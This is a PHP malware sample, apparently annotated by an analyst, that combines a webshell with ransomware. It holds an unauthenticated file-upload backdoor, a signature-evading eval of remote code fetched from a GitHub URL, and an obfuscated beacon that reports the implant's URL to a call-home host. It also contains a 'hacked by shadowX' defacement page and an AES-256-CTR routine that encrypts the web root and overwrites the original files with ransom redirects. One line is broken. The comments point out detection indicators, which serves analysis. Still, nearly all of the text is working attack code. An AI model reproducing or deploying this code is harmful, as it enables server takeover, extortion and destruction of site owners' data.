// Analyst note: unauthenticated file-upload backdoor. This branch runs for any
// request that carries the `mrz` query parameter; nothing else is checked first.
if (isset($_GET['mrz'])) {
echo '<form action="" method="post" enctype="multipart/form-data" name="b4b4" id="b4b4">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload">';
echo '</form>';
echo '<a href="#">Hello Dady</a>';
// Detection hint: a multipart POST with `_upl=Upload` sent to a URL containing `?mrz`.
if ($_POST['_upl'] == "Upload") {
// The temp file is copied to the client-supplied file name as a relative path,
// so the requester picks the name and extension. @ suppresses any warning.
if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
// The client-supplied name is written back into the HTML response unescaped.
echo '<b>Done</b><br><br><a href="./' . $_FILES['file']['name'] . '">' . $_FILES['file']['name'] . '</a>';
} else {
echo '<b>Not Upload File !</b><br><br>';
}
}
// Stops here so the rest of the script does not run for `mrz` requests.
exit;
}
// Analyst note: remote code loader. A request carrying the `mrzali` query parameter
// makes the host download PHP source from the hard-coded URL below and pass it to
// eval(), so the executed payload lives off-host and can change between requests.
if (isset($_GET['mrzali'])) {
// The empty /* */ comments and the `@null;` statement do nothing at run time; they
// only break up the `eval(file_get_contents(...))` token sequence that simple
// signatures look for. @ suppresses errors from eval.
/****/@null; /********/ /**/ /********/@eval/****/("".file_get_contents/*******/("https://raw.githubusercontent.com/sagsooz/Bypass-Webshell/main/csa.php"));/**/
exit;
}
// Analyst note: call-home setup. Everything in this run is string obfuscation around
// one outbound POST; the decoded values are given in the comments below.
echo '
';$z = strrev('edoced_46esab');
// $z is the reversed string, i.e. the function name 'base64_decode'.
// $a holds character codes; joined with chr() they spell
// hxxps://siyahi[.]top/test/style.php (defanged here).
$a = array(104, 116, 116, 112, 115, 58, 47, 47, 115, 105, 121, 97, 104, 105, 46, 116, 111, 112, 47, 116, 101, 115, 116, 47, 115, 116, 121, 108, 101, 46, 112, 104, 112);
$b = '';
foreach ($a as $c) { $b .= chr($c); }
// Encode-then-decode round trip: $x ends up equal to $b (the URL above).
$x = $z(base64_encode($b));
// $y is this script's own URL as seen by the client, rebuilt from request headers.
$y = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
// The chr() calls spell 'file', so the form field is 'file_url' => own URL.
$d = array(chr(102) . chr(105) . chr(108) . chr(101) . '_url' => $y);
// The chr() calls spell 'http' and 'post': a stream context for a form-encoded POST.
$o = array(
chr(104) . chr(116) . chr(116) . chr(112) => array(
'method' => strtoupper(chr(112) . chr(111) . chr(115) . chr(116)),
'header' => 'Content-type: application/x-www-form-urlencoded',
'content' => http_build_query($d),
),
);
// Note: $c is reused here; it held the last character code from the loop above.
$c = stream_context_create($o);
/**
 * Fetch helper used for the call-home request.
 *
 * Tries file_get_contents() with the supplied stream context first and, if that
 * is unavailable or returns false, falls back to a cURL POST. Every failure is
 * silent: the function returns an empty string instead of reporting an error.
 *
 * @param string   $u URL to request.
 * @param resource $c Stream context; only the file_get_contents() path uses it.
 * @return string Response body, or '' when both transports fail.
 */
function _f($u, $c) {
if (function_exists('file_get_contents')) {
// @ hides network and wrapper warnings from the page and the error log.
$r = @file_get_contents($u, false, $c);
if ($r !== false) return $r;
}
if (function_exists('curl_init')) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $u);
curl_setopt($ch, CURLOPT_POST, 1);
// The POST body is rebuilt from the global $d rather than taken from $c.
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($GLOBALS['d']));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
$r = curl_exec($ch);
curl_close($ch);
if ($r !== false) return $r;
}
return '';
}
// Analyst note: this call sends the beacon, reporting the implant's own URL to the
// decoded endpoint on every page load that reaches this point. The response is
// stored in $r, which the visible lines never read again.
$r = _f($x, $c);
// Defacement page, emitted as one literal string. It loads images from third-party
// hosts and links to a Telegram channel; those URLs and the "shadowX" strings are
// usable as content indicators when scanning served pages.
echo '
<!DOCTYPE html>
<html>
<head>
<title>hacked by shadowX</title>
</head>
<body style="background:#000;margin:0;height:100vh;display:flex;flex-direction:column;align-items:center;justify-content:center;position:relative">
<img src="https://static.vecteezy.com/system/resources/thumbnails/039/000/595/large/kurdistan-waving-flag-realistic-flag-animation-seamless-loop-background-free-video.jpg"
style="position:absolute;top:20px;left:20px;width:220px;height:165px;border:3px solid #333;border-radius:8px;box-shadow:0 0 15px rgba(255,0,0,0.7)">
<img src="https://i.ibb.co/zHQPkPPD/file-0000000086a471f583cd9072dece31a1-1.png"
style="position:absolute;top:20px;right:20px;width:220px;height:220px;border-radius:150%;border:3px solid #0f0;box-shadow:0 0 15px rgba(0,255,0,0.7)">
<img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcT4cyZpZEXYgkCTs5Oy8eWhfg08g-q9zp7e_MRz_iyNsGUAi8PabW31IcR_&s=10"
style="width:550px;height:550px;object-fit:cover;border-radius:10px;border:3px solid #333;box-shadow:0 0 20px rgba(0,0,0,0.9)">
<h1 style="color:#0f0;font-family:monospace;font-size:32px;margin:25px 0;letter-spacing:2px;text-shadow:0 0 10px rgba(0,255,0,0.5)">H̴a̴c̴k̴e̴d̴ ̴b̴y̴ ̴s̴h̴a̴d̴o̴w̴X̴</h1>
<div style="background:#111;color:#f00;padding:15px;margin:20px 0;border:2px solid #f00;border-radius:8px;font-family:monospace;font-size:24px;text-align:center;width:500px;line-height:1.6;box-shadow:0 0 15px rgba(255,0,0,0.4)">
<div style="font-size:35%; color:#ff0; text-align:center;">
<h1>save rojava- free rojava fuck usa fuck turkey</h1>
<a href="https://t.me/Pharaohs_n"
style="color:#0f0;text-decoration:none;font-size:18px;padding:12px 30px;border:2px solid #0f0;border-radius:6px;margin-top:20px;transition:all 0.3s"
onmouseover="this.style.background=\'rgba(0,255,0,0.2)\';this.style.boxShadow=\'0 0 20px rgba(0,255,0,0.8)\';this.style.transform=\'scale(1.05)\'"
onmouseout="this.style.background=\'transparent\';this.style.boxShadow=\'none\';this.style.transform=\'scale(1)\'"
target="_blank">TELEGRAM CHANNEL</a>
</body>
</html>
';
// Analyst note: start of the file-encryption component. The next three calls lift
// the memory and execution-time limits and turn off error reporting, so a long
// directory walk is not interrupted and leaves no PHP errors behind.
ini_set('memory_limit', '-1');
set_time_limit(0);
error_reporting(0);
// Cipher name handed to OpenSSL and the suffix appended to encrypted copies.
// Files ending in ".ultra" are a host-side indicator of this sample.
$cfg = ['cipher' => "aes-256-ctr", 'ext' => ".ultra"];
// Argon2id hash checked with password_verify() before anything is processed.
// The password itself is not in the file, only this hash.
$stored_hash = '$argon2id$v=19$m=65536,t=4,p=1$T1RiOEc2aGdNYnQueW54bg$NMAYHEnGC+PXxW+ZUah+a02SaGTaiFpTw/v88qzJkBo';
// Log written next to the script; another artifact to look for during triage.
$logFile = __DIR__ . "/processed_files.log";
/**
 * Derives the 32-byte key used for file contents.
 *
 * The key is the first 32 bytes of the raw SHA-512 digest of the password, so it
 * is fully determined by the password; no per-host or per-file value is mixed in.
 *
 * @param string $password Operator password from the POST form.
 * @return string 32 raw bytes.
 */
function mainKey($password) {
return substr(hash("sha512", $password, true), 0, 32);
}
/**
 * Derives the 32-byte key used to encrypt the processed-files log.
 *
 * Same construction as the file key, with the literal prefix "LOG-" put in front
 * of the password before hashing.
 *
 * @param string $password Operator password from the POST form.
 * @return string 32 raw bytes.
 */
function logKey($password) {
return substr(hash("sha512", "LOG-" . $password, true), 0, 32);
}
/**
 * Derives the 32-byte key used to authenticate the processed-files log.
 *
 * First 32 bytes of the raw SHA-512 digest of "HMAC-" followed by the password.
 * In the visible code only saveLog() calls this function.
 *
 * @param string $password Operator password from the POST form.
 * @return string 32 raw bytes.
 */
function hmacKey($password) {
return substr(hash("sha512", "HMAC-" . $password, true), 0, 32);
}
/**
 * Appends an encrypted record of the processed paths to the log file.
 *
 * Each run adds one base64 line whose decoded layout is
 * IV (16 bytes) || HMAC-SHA256 (32 bytes) || AES-256-CTR ciphertext of the JSON
 * path list. For responders, the file's presence and line count show how many
 * runs took place, even though the contents are unreadable without the password.
 *
 * @param array  $files    Paths collected during the run; nothing is written when empty.
 * @param string $logFile  Destination log path.
 * @param string $password Operator password the log keys are derived from.
 * @return void
 */
function saveLog($files, $logFile, $password) {
if (empty($files)) return;
$key = logKey($password);
$hkey = hmacKey($password);
$iv = random_bytes(16);
$data = json_encode($files);
$enc = openssl_encrypt($data, "aes-256-ctr", $key, OPENSSL_RAW_DATA, $iv);
// The MAC covers the IV and the ciphertext.
$hmac = hash_hmac("sha256", $iv . $enc, $hkey, true);
file_put_contents($logFile, base64_encode($iv . $hmac . $enc) . PHP_EOL, FILE_APPEND);
}
/**
 * Overwrites a file in place with a redirect stub or a ransom message.
 *
 * The original path is kept but its contents are replaced, so after a run the
 * original data exists only in the encrypted sibling copy. The literal strings
 * written here are usable as content signatures when sweeping a web root.
 *
 * @param string $file Path of the file to overwrite.
 * @return void
 */
function replaceContent($file) {
// The extension comparison is case-sensitive and exact.
$ext = pathinfo($file, PATHINFO_EXTENSION);
if ($ext === "php") {
file_put_contents($file, "header('Location: ransom.html'); exit;");
} elseif ($ext === "html" || $ext === "htm") {
file_put_contents($file, '<meta http-equiv="refresh" content="0;url=ransom.html">');
} else {
file_put_contents($file, "hacked by shadowX All your files have been encrypted. Contact: @phteam_s");
}
}
/**
 * Encrypts or decrypts a single file, depending on $mode.
 *
 * On-disk format of an encrypted copy, useful for identification and recovery
 * tooling: IV (16 bytes) || HMAC-SHA256 (32 bytes) || ciphertext, stored at the
 * original path plus the configured suffix.
 *
 * @param string $file           Path to process.
 * @param string $mode           "encrypt" or "decrypt"; any other value does nothing.
 * @param string $password       Operator password the key is derived from.
 * @param array  $processedFiles Collected by reference; receives each path handled.
 * @param array  $cfg            Holds 'cipher' and 'ext'.
 * @return void
 */
function processFile($file, $mode, $password, &$processedFiles, $cfg) {
$key = mainKey($password);
if ($mode === "encrypt") {
// Skip files that already carry the suffix, so a second run does not re-encrypt them.
if (substr($file, -strlen($cfg['ext'])) === $cfg['ext']) return;
// The whole file is read into memory; unreadable files are skipped silently.
$data = @file_get_contents($file);
if ($data === false) return;
$iv = random_bytes(16);
$enc = openssl_encrypt($data, $cfg['cipher'], $key, OPENSSL_RAW_DATA, $iv);
if ($enc !== false) {
// The MAC covers IV || ciphertext and is keyed with $key.
$hmac = hash_hmac("sha256", $iv . $enc, $key, true);
file_put_contents($file . $cfg['ext'], $iv . $hmac . $enc);
// The original path is then overwritten with the stub or note, not deleted.
replaceContent($file);
$processedFiles[] = $file;
}
} elseif ($mode === "decrypt") {
// Only files carrying the suffix are considered.
if (substr($file, -strlen($cfg['ext'])) !== $cfg['ext']) return;
$raw = file_get_contents($file);
// 48 = 16-byte IV + 32-byte HMAC; anything shorter cannot be a valid record.
if (strlen($raw) < 48) return;
$iv = substr($raw, 0, 16);
$hmac = substr($raw, 16, 32);
$enc = substr($raw, 48);
$calc = hash_hmac("sha256", $iv . $enc, $key, true);
// A MAC mismatch (wrong password or altered file) leaves the file untouched.
if (!hash_equals($hmac, $calc)) return;
$dec = openssl_decrypt($enc, $cfg['cipher'], $key, OPENSSL_RAW_DATA, $iv);
if ($dec !== false) {
// The plaintext is restored over the stub at the original path and the
// encrypted copy is removed.
$out = substr($file, 0, -strlen($cfg['ext']));
file_put_contents($out, $dec);
unlink($file);
$processedFiles[] = $out;
}
}
}
/**
 * Recursively walks $dir and hands every regular file to processFile().
 *
 * The walk has no depth limit and no path filter beyond the basename skip list,
 * so its reach is whatever the PHP process can read and write under $dir.
 *
 * @param string $dir            Directory to walk.
 * @param string $mode           Passed through to processFile().
 * @param string $password       Passed through to processFile().
 * @param array  $processedFiles Collected by reference across the recursion.
 * @param array  $cfg            Passed through to processFile().
 * @return void
 */
function scanAndProcess($dir, $mode, $password, &$processedFiles, $cfg) {
$items = scandir($dir);
foreach ($items as $item) {
// NOTE(review): as rendered on this page the first comparison has no right-hand
// operand, so the listing does not parse as shown; a literal appears to have been
// lost when the sample was captured.
if ($item === || $item === "..") continue;
$path = $dir . DIRECTORY_SEPARATOR . $item;
// Basenames left alone at every directory level: the implant's own pages, its
// log and note, and the server config. The list doubles as the set of file
// names this kit presumably drops or relies on; confirm against the host.
if (in_array($item, ['index.php','cmd.php','index.html','access_log.txt','processed_files.log','ransom.html','.htaccess'])) continue;
if (is_dir($path)) {
scanAndProcess($path, $mode, $password, $processedFiles, $cfg);
} else {
processFile($path, $mode, $password, $processedFiles, $cfg);
}
}
}
// Analyst note: operator entry point. Any POST to this script is treated as a
// control request; in web logs this shows up as a POST to the implant followed by
// a redirect to ransom.html.
$processedFiles = [];
$msg = "";
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$input = $_POST['password'] ?? '';
$mode = $_POST['mode'] ?? '';
// Nothing is processed unless the submitted password matches the stored argon2id hash.
if (password_verify($input, $stored_hash)) {
if (in_array($mode, ['encrypt', 'decrypt'])) {
// The walk starts at the directory that contains this script.
scanAndProcess(__DIR__, $mode, $input, $processedFiles, $cfg);
saveLog($processedFiles, $logFile, $input);
header("Location: ransom.html");
exit;
}
} else {
// $msg is set here but the visible lines never print it.
$msg = "Wrong password.";
}
}
// Control form appended after the defacement markup; the two submit buttons carry
// the `mode` value.
echo '
<form method="POST">
<input type="password" name="password" placeholder="Enter password" required><br>
<input type="submit" name="mode" value="encrypt">
<input type="submit" name="mode" value="decrypt">
</form>
</body>
</html>';